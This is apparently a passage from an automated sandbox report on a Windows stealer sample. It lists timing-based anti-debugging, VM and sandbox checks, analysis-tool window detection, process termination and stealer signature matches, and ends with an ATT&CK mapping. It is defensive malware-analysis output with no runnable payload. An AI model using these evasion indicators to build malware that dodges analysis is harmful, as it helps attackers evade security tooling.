              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594B25 second address: 594B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 594B29 second address: 594B63 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jmp 00007F2B9CBCE6B7h 0x0000000f jnl 00007F2B9CBCE6A6h 0x00000015 jl 00007F2B9CBCE6A6h 0x0000001b push edx 0x0000001c pop edx 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D4FC second address: 59D519 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Dh 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F2B9CB0EC06h 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D519 second address: 59D562 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6B8h 0x00000007 jmp 00007F2B9CBCE6B5h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop esi 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 jmp 00007F2B9CBCE6B1h 0x0000001a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59D562 second address: 59D574 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B708 second address: 59B728 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B728 second address: 59B734 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F2B9CB0EC06h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA55 second address: 59BA6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CBCE6B4h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA6D second address: 59BA71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA71 second address: 59BA80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F2B9CBCE6A6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ecx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA80 second address: 59BA8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edx 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BA8B second address: 59BA95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007F2B9CBCE6A6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC13 second address: 59BC21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2B9CB0EC0Ah 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC21 second address: 59BC29 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC29 second address: 59BC4C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CB0EC0Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push ebx 0x0000000a pushad 0x0000000b jmp 00007F2B9CB0EC0Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BC4C second address: 59BC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD78 second address: 59BD80 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 pop eax 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59BD80 second address: 59BD92 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6AEh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CBF2 second address: 59CC03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 pushad 0x00000008 js 00007F2B9CB0EC06h 0x0000000e pushad 0x0000000f popad 0x00000010 popad 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC03 second address: 59CC1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2B9CBCE6B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC1E second address: 59CC52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2B9CB0EC11h 0x0000000b jmp 00007F2B9CB0EC0Eh 0x00000010 popad 0x00000011 pop edx 0x00000012 pop eax 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 popad 0x00000019 jnp 00007F2B9CB0EC06h 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC52 second address: 59CC60 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2B9CBCE6ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC60 second address: 59CC64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59CC64 second address: 59CC74 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2B9CBCE6ABh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 59B144 second address: 59B14A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 545E08 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 36FC4C instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Special instruction interceptor: First address: 5A783E instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
              Source: C:\Users\user\Desktop\file.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
              Source: C:\Users\user\Desktop\file.exe Evaded block: after key decision graph_0-29046
              Source: C:\Users\user\Desktop\file.exe Evasive API call chain: GetSystemTime,DecisionNodes graph_0-27864
              Source: C:\Users\user\Desktop\file.exe API coverage: 4.7 %
              Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001319F0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_001319F0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00133A70 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00133A70
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0012DB80 lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0012DB80
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001313B9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_001313B9
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001313A0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_001313A0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0013E3F0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0013E3F0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00134C70 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_00134C70
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00134C89 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_00134C89
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001324F9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_001324F9
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001324E0 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_001324E0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0013CDD0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_0013CDD0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001216B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_001216B9
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_001216A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_001216A0
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0013D720 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_0013D720
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_0013DF20 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_0013DF20
              Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00141DC0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_00141DC0
              Source: file.exe, file.exe, 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMwareMQ
              Source: file.exe, 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2081679058.0000000001428000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081679058.0000000001456000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2081679058.000000000143A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27850
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27858
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27703
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-27723
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

Source: C:\Users\user\Desktop\file.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe | File opened: NTICE
Source: C:\Users\user\Desktop\file.exe | File opened: SICE
Source: C:\Users\user\Desktop\file.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00124A60 VirtualProtect 00000000,00000004,00000100,? 0_2_00124A60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001468F0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_001468F0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001465A0 mov eax, dword ptr fs:[00000030h] 0_2_001465A0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00142910 GetWindowsDirectoryA,GetVolumeInformationA,GetProcessHeap,RtlAllocateHeap,wsprintfA, 0_2_00142910
Source: all processes | Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Users\user\Desktop\file.exe | Memory protected: page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match | File source: Process Memory Space: file.exe PID: 5436, type: MEMORYSTR
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144820 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle, 0_2_00144820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_001448B0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle, 0_2_001448B0
Source: file.exe, file.exe, 00000000.00000002.2081251756.00000000004FB000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: mProgram Manager
Source: C:\Users\user\Desktop\file.exe | Code function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree, 0_2_00142F30
Source: C:\Users\user\Desktop\file.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00144040 lstrcpy,lstrcpy,GetSystemTime, 0_2_00144040
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00142C10 GetProcessHeap,RtlAllocateHeap,GetUserNameA, 0_2_00142C10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00142DE0 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA, 0_2_00142DE0

Stealing of Sensitive Information

Source: Yara match | File source: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2040747804.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5436, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP

Remote Access Functionality

Source: Yara match | File source: 00000000.00000002.2080969358.0000000000121000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.2081679058.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000003.2040747804.00000000052A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: file.exe PID: 5436, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
MITRE ATT&CK Matrix (one line per tactic; a leading number is the count of matched signatures for that technique, techniques without a number had no match)

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: 2 Command and Scripting Interpreter; 13 Native API; At; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
Persistence: 1 Create Account; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
Defense Evasion: 1 Masquerading; 33 Virtualization/Sandbox Evasion; 11 Disable or Modify Tools; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 12 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: 2 System Time Discovery; 641 Security Software Discovery; 33 Virtualization/Sandbox Evasion; 13 Process Discovery; 1 Account Discovery; 1 System Owner/User Discovery; 1 File and Directory Discovery; 324 System Information Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
